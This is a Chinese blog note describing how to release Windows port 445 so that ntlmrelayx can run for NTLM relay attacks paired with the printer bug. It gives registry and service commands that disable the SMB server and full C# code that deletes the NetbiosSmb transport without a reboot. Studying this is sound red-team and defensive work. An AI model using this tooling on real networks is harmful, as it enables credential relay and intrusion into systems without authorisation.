445 SMB Release
前言:实战打印机漏洞配合跨协议中继外网服务器进行利用的话会比较麻烦,如果当前主机是Windows的话那么可以直接尝试释放本地445端口然后用ntlmrelay来进行利用,这里的话进行编写445 SMB端口释放的代码,简单记录下笔记
参考文章:https://www.cnblogs.com/zpchcbd/p/17912581.html
参考文章:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe
情况
参考文章:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe
在上述的参考文章中提到一点是可以把Windows本地445端口进行释放关闭的,但是操作执行完之后需要进行重启的操作,这个比较麻烦
reg add HKLM\SYSTEM\CurrentControlSet\Services\NetBT /v SMBDeviceEnabled /t REG_QWORD /d 0 Stop-Service "LanmanServer" -Force Set-Service "LanmanServer" -StartupType Disabled Reboot
代码实现
通过下面的代码可以避免重启的情况下来释放445端口
using System; using System.Runtime.InteropServices; using System.Text; namespace ReleaseSMB { public class Program { private const int NERR_Success = 0; private const int MAX_PREFERRED_LENGTH = -1; private const int ERROR_MORE_DATA = 234; [DllImport("Netapi32.dll", CharSet = CharSet.Unicode)] public static extern int NetServerTransportEnum( string servername, int level, out IntPtr bufptr, int prefmaxlen, out int entriesread, out int totalentries, out int resumehandle); [DllImport("Netapi32.dll")] public static extern int NetApiBufferFree(IntPtr Buffer); [DllImport("Netapi32.dll", CharSet = CharSet.Unicode)] public static extern int NetServerTransportDel( string servername, int level, IntPtr bufptr); [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct SERVER_TRANSPORT_INFO_0 { public int svti0_numberofvcs; public string svti0_transportname; public string svti0_transportaddress; public int svti0_transportaddresslength; public string svti0_networkaddress; } public static bool DisconnectTransport(string transport) { int entriesRead; int totalEntries; int resumeHandle = 0; IntPtr buffer = IntPtr.Zero; int totalCount = 0; bool found = false; do { int result = NetServerTransportEnum(null, 0, out buffer, MAX_PREFERRED_LENGTH, out entriesRead, out totalEntries, out resumeHandle); if (result == NERR_Success || result == ERROR_MORE_DATA) { IntPtr currentPtr = buffer; for (int i = 0; i < entriesRead; i++) { SERVER_TRANSPORT_INFO_0 sti = (SERVER_TRANSPORT_INFO_0)Marshal.PtrToStructure(new IntPtr(currentPtr.ToInt64() + (Marshal.SizeOf(typeof(SERVER_TRANSPORT_INFO_0)) * i)), typeof(SERVER_TRANSPORT_INFO_0)); Console.WriteLine("\tFound Transport: " + sti.svti0_transportname); if (sti.svti0_transportname.Equals(transport)) { int status = NetServerTransportDel(null, 0, currentPtr); if (status == NERR_Success) { Console.WriteLine($"\tDeleted {transport}"); found = true; } else { Console.WriteLine($"\tError {status} while deleting {transport}"); } } totalCount++; } } else { Console.WriteLine($"A system error has occurred: {result}"); } // Free the allocated memory if (buffer != IntPtr.Zero) { NetApiBufferFree(buffer); buffer = IntPtr.Zero; } } while (totalEntries > 0 && resumeHandle != 0); Console.WriteLine($"Total of {totalCount} entries enumerated"); return found; } public static void Main(string[] args) { DisconnectTransport("\\Device\\NetbiosSmb"); } } }
效果演示
SMB Release未执行前,如下图所示
SMB Release执行后,如下图所示,图中的报错不是SMB端口的问题,是443被占用了,这台机器当前443是有HTTP服务开着的
中继效果如下图所示,正常运行
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
2019-12-22 JSONP的安全问题
2019-12-22 学习:VB调式之4C法
2019-12-22 PUSH越界/INT 68/反调试的绕过
2019-12-22 ZwQueryInformationProcess的反调试调试